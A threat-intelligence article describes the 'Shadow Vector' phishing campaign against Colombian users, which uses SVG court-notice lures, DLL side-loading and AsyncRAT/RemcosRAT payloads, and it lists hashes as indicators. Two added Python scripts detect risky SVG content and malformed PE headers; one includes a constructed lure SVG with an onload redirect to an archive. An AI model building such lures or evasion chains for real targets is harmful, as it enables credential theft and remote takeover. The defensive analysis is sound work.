Shadow Vector Malware Uses SVG Images to Deliver AsyncRAT and RemcosRAT Payloads

Acronis Threat Research Unit (TRU) has discovered a startling development: a malicious campaign called “Shadow Vector” is actively targeting Colombian users using malicious Scalable Vector Graphics (SVG) files, a novel attack vector.

Disguised as urgent court notifications, these SVG files are embedded in spear-phishing emails that impersonate trusted national institutions, exploiting public trust to trick victims into downloading dangerous payloads.

This campaign represents a growing trend of abusing trusted file formats like SVG, now formally recognized as a subtechnique in the MITRE ATT&CK framework under “SVG smuggling,” due to their ability to render cleanly in browsers, support embedded scripts, and often bypass traditional email security filters.

A Sophisticated Phishing Campaign Targets Colombia

The Shadow Vector operation employs a meticulously crafted delivery mechanism that starts with phishing emails containing SVG attachments designed to mimic official legal documents.

[Figure: Phishing email impersonating Colombia’s labor court]

These files include embedded links labeled as access to further documentation, redirecting users to password-protected ZIP archives hosted on public platforms like Bitbucket, Discord CDN, and YDRAY.
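The two properties that make SVG smuggling work are spelled out in the paragraphs above: the format can carry scripts and event handlers, and the lure files carry links out to archive downloads. As an added example (not code from the Acronis report or this article), the following Python script performs the static triage an analyst or a mail-gateway plug-in could run on an SVG attachment before it reaches a browser: it counts script elements, lists inline event handlers, `javascript:` URIs and external http(s) links, and flags links that point at archive files. The sample SVG is constructed for illustration; `example.invalid` is a reserved placeholder domain, not an indicator from the campaign.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# File extensions of the archive types the lures link to (ZIP is named in the
# report; the others are assumed additions for broader coverage).
ARCHIVE_SUFFIXES = (".zip", ".rar", ".7z")

# Constructed sample resembling the lure: a "court notice" with an onload
# handler, an inline script and an anchor to a hosted archive.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <text x="10" y="20">Notificacion judicial</text>
  <a xlink:href="https://example.invalid/docs/documentos.zip">
    <text x="10" y="40">Ver documentos</text>
  </a>
  <script>function init(){ window.location = "https://example.invalid/docs/documentos.zip"; }</script>
</svg>
"""

CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>'


def _local(name: str) -> str:
    """Strip an XML namespace prefix of the form {uri}local."""
    return name.split("}")[-1]


def triage_svg(svg_text: str) -> dict:
    """Return a findings dict describing scriptable or outbound content in an SVG."""
    findings = {
        "scripts": 0,
        "event_handlers": [],
        "js_uris": [],
        "external_links": [],
        "archive_links": [],
    }
    root = ET.fromstring(svg_text)
    for element in root.iter():
        tag = _local(element.tag)
        if tag == "script":
            findings["scripts"] += 1
        for attr, value in element.attrib.items():
            name = _local(attr)
            # Inline event handlers (onload, onclick, ...) execute on render.
            if name.lower().startswith("on"):
                findings["event_handlers"].append(f"<{tag} {name}>")
            # Both plain href and xlink:href can carry a navigation target.
            if name == "href":
                target = value.strip()
                if target.lower().startswith("javascript:"):
                    findings["js_uris"].append(target)
                    continue
                parsed = urlparse(target)
                if parsed.scheme in ("http", "https"):
                    findings["external_links"].append(target)
                    if parsed.path.lower().endswith(ARCHIVE_SUFFIXES):
                        findings["archive_links"].append(target)
    risky = (findings["scripts"] or findings["event_handlers"]
             or findings["js_uris"] or findings["external_links"])
    findings["verdict"] = "suspicious" if risky else "clean"
    return findings


if __name__ == "__main__":
    for label, doc in (("lure", SAMPLE_SVG), ("clean", CLEAN_SVG)):
        print(label, triage_svg(doc))
```

A real gateway would also want to inspect `<foreignObject>` and data: URIs, but the four signals above already separate a static drawing from a rendering-time dropper; an SVG that needs none of them to display is the normal case for a legitimate image.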

Once extracted, these archives reveal a mix of legitimate executables and malicious DLLs that initiate a multistage infection chain through DLL side-loading, a technique in which a trusted process unwittingly loads malicious code.

[Figure: Flowchart of the multistage malware attack]

According to the Acronis report, this ultimately deploys remote access tools (RATs) such as AsyncRAT and RemcosRAT, which are notorious for enabling keylogging, credential theft (including banking details), and full remote control of compromised systems.

The use of password protection adds a layer of user interaction, reducing the likelihood of automated detection while increasing victim engagement.

Evolving Tactics with Multistage Infection Chains

Further technical analysis reveals the campaign’s sophistication in evading analysis and maintaining persistence.

For instance, AsyncRAT payloads are hidden within manipulated DLLs like “mscorlib.dll,” with intentionally offset PE headers to disrupt automated parsing tools.
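The article does not say exactly how the PE headers are offset, so the following is an added example (not the report's or the article's code) that assumes one common form of the trick: the DOS header's `e_lfanew` field no longer points at the `PE\0\0` signature, so a parser that trusts the field sees a non-PE file while the loader-side stager knows the real offset. The check below reads the DOS header the way a triage tool would, validates `e_lfanew` against the file size and a sane upper bound, and then searches for the signature independently so a mismatch is reported rather than silently accepted. The sample blobs are constructed in the block; the `mscorlib.dll` name is only used as a label.

```python
import struct

PE_SIGNATURE = b"PE\x00\x00"
DOS_HEADER_SIZE = 0x40
E_LFANEW_OFFSET = 0x3C
# Assumption: in legitimate binaries e_lfanew is small; larger values deserve a look.
MAX_REASONABLE_E_LFANEW = 0x400


def check_pe_header(data: bytes) -> dict:
    """Sanity-check the DOS header and the PE signature it claims to point at."""
    result = {"e_lfanew": None, "pe_signature_ok": False, "suspicious": []}
    if len(data) < DOS_HEADER_SIZE or data[:2] != b"MZ":
        result["suspicious"].append("missing MZ signature or truncated DOS header")
        return result
    e_lfanew = struct.unpack_from("<I", data, E_LFANEW_OFFSET)[0]
    result["e_lfanew"] = e_lfanew
    if e_lfanew < DOS_HEADER_SIZE:
        result["suspicious"].append("e_lfanew overlaps the DOS header")
    elif e_lfanew > MAX_REASONABLE_E_LFANEW:
        result["suspicious"].append(f"unusually large e_lfanew 0x{e_lfanew:x}")
    # Slicing is bounds-safe: an e_lfanew past EOF simply yields a short slice.
    if data[e_lfanew:e_lfanew + len(PE_SIGNATURE)] == PE_SIGNATURE:
        result["pe_signature_ok"] = True
    else:
        result["suspicious"].append("no PE signature at e_lfanew")
    # A parser that only trusts e_lfanew stops above; an independent search
    # exposes a signature the DOS header has been pointed away from.
    found = data.find(PE_SIGNATURE)
    if found != -1 and found != e_lfanew:
        result["suspicious"].append(f"PE signature found at 0x{found:x}, not at e_lfanew")
    return result


def build_sample(e_lfanew: int, pe_at: int, total: int = 0x200) -> bytes:
    """Construct a minimal MZ stub whose e_lfanew and real PE signature can disagree."""
    buf = bytearray(total)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, E_LFANEW_OFFSET, e_lfanew)
    if pe_at + len(PE_SIGNATURE) <= total:
        buf[pe_at:pe_at + len(PE_SIGNATURE)] = PE_SIGNATURE
    return bytes(buf)


# Constructed samples: a well-formed header, a header whose e_lfanew misses the
# real signature, and one whose e_lfanew points past the end of the file.
NORMAL_SAMPLE = build_sample(e_lfanew=0x80, pe_at=0x80)
OFFSET_SAMPLE = build_sample(e_lfanew=0x80, pe_at=0x100)
PAST_EOF_SAMPLE = build_sample(e_lfanew=0x1000, pe_at=0x80)


if __name__ == "__main__":
    samples = {
        "mscorlib.dll (normal layout)": NORMAL_SAMPLE,
        "mscorlib.dll (offset header)": OFFSET_SAMPLE,
        "mscorlib.dll (e_lfanew past EOF)": PAST_EOF_SAMPLE,
    }
    for label, blob in samples.items():
        print(label, check_pe_header(blob))
```

The point of the second search is that "not a valid PE" is itself a finding worth surfacing for a file that sits next to a legitimate executable in an archive; a tool that returns nothing for malformed input gives the evasion exactly the silence it was designed for.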

Techniques such as process hollowing, where malicious code is injected into legitimate processes like AddInProcess32.exe, allow the malware to operate under the guise of trusted system binaries.

Additionally, Shadow Vector incorporates anti-analysis checks, terminating execution if it detects virtual environments or debuggers by scanning for indicators like VMware or VirtualBox.

The latest iterations also feature a modular .NET loader akin to Katz Stealer, using JavaScript and PowerShell stagers, UAC bypass via cmstp.exe, and in-memory execution to leave minimal disk footprints.

Encrypted configurations, Portuguese-language strings, and dynamic payload retrieval from platforms like the Internet Archive suggest potential ties to Brazilian cybercrime ecosystems, hinting at cross-regional collaboration.

This evolving threat, while currently focused on data theft, poses a latent risk of escalating to ransomware deployment given its capabilities.

The Superior Council of Judicature in Colombia has issued warnings about these impersonation tactics, urging vigilance.

Indicators of Compromise (IOCs)

Type       Indicator (sample SHA-256 hash)
SVG file   64e971f0fed4da9d71cd742db56f73b6f7da8fec3b8aebd17306e8e0d4f1d29d
Package    bf596502f05062d156f40322bdbe9033b28df967ce694832a78482b47dcdd967
Payload    0e5a768a611a4d0ed7cb984b2ee790ad419c6ce0be68c341a2d4f64c531d8122
